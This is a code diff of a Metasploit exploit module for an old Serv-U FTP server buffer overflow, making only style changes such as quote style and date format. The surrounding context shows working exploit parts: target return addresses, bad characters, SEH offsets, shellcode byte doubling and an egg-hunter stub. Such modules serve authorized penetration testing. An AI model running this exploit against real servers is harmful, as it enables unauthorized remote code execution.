@@ -40,33 +40,32 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'Space' => 1000,
           'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
-          'StackAdjustment' => -3500,
+          'StackAdjustment' => -3500
         },
-        'Platform' => %w{win},
         'Targets' => [
           [
             'Serv-U Uber-Leet Universal ServUDaemon.exe', # Tested OK - hdm 11/25/2005
             {
               'Platform' => 'win',
-              'Ret' => 0x00401877,
+              'Ret' => 0x00401877
             },
           ],
           [
             'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe',
             {
               'Platform' => 'win',
-              'Ret' => 0x0040164d,
+              'Ret' => 0x0040164d
             },
           ],
           [
             'Serv-U 5.0.0.0 ServUDaemon.exe',
             {
               'Platform' => 'win',
-              'Ret' => 0x0040167e,
+              'Ret' => 0x0040167e
             },
           ],
         ],
-        'DisclosureDate' => 'Feb 26 2004',
+        'DisclosureDate' => '2004-02-26',
         'DefaultTarget' => 0,
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
@@ -78,8 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_advanced_options(
       [
-        OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]),
-        OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]),
+        OptInt.new('SEHOffset', [ false, 'Offset from beginning of timezone to SEH', 47 ]),
+        OptInt.new('ForceDoubling', [ false, '1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect', 2 ]),
       ]
     )
   end
@@ -104,23 +103,23 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Appears
 
     when /Serv-U FTP Server v5\.0/
-      vprint_status('Found version 5! 5.0.0.0 may be exploitable, but not 5.0.0.4');
+      vprint_status('Found version 5! 5.0.0.0 may be exploitable, but not 5.0.0.4')
       return Exploit::CheckCode::Detected
 
     when /Serv-U FTP Server v4\.0/
-      vprint_status('Found version 4.0.0.4 or 4.1.0.0, additional check.');
+      vprint_status('Found version 4.0.0.4 or 4.1.0.0, additional check.')
       send_user(datastore['USER'])
       send_pass(datastore['PASS'])
-      if (double_ff?())
-        vprint_status('Found version 4.0.0.4, exploitable');
+      if (double_ff?)
+        vprint_status('Found version 4.0.0.4, exploitable')
         return Exploit::CheckCode::Appears
       else
-        vprint_status('Found version 4.1.0.0, exploitable');
+        vprint_status('Found version 4.1.0.0, exploitable')
         return Exploit::CheckCode::Appears
       end
 
-    when /Serv\-U FTP Server/
-      vprint_status('Found an unknown version, try it!');
+    when /Serv-U FTP Server/
+      vprint_status('Found an unknown version, try it!')
       return Exploit::CheckCode::Detected
 
     else
@@ -133,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     c = connect_login
-    return if not c
+    return if !c
 
     print_status("Trying target #{target.name}...")
 
@@ -144,13 +143,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case datastore['ForceDoubling']
     when 1
-      print_status("Forced doubling of all \\xff sequences in the encoded payload")
+      print_status('Forced doubling of all \\xff sequences in the encoded payload')
       shellcode.gsub!(/\xff/, "\xff\xff")
     when 0
-      print_status("Forced doubling has been disabled")
+      print_status('Forced doubling has been disabled')
     when 2
-      if (double_ff?())
-        print_status("Forced doubling enabled after detection of version 4.0.0.4")
+      if (double_ff?)
+        print_status('Forced doubling enabled after detection of version 4.0.0.4')
         shellcode.gsub!(/\xff/, "\xff\xff")
       end
     end
@@ -163,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
     search_stub = Rex::Arch::X86.searcher(search_rtag)
     search_code = "\x83\xc4\xfc\x5f" + search_stub + 'BB'
     if (datastore['SEHOffset'] < search_code.length)
-      print_error("Not enough room for search code, adjust SEHOffset")
+      print_error('Not enough room for search code, adjust SEHOffset')
       return
     end
 
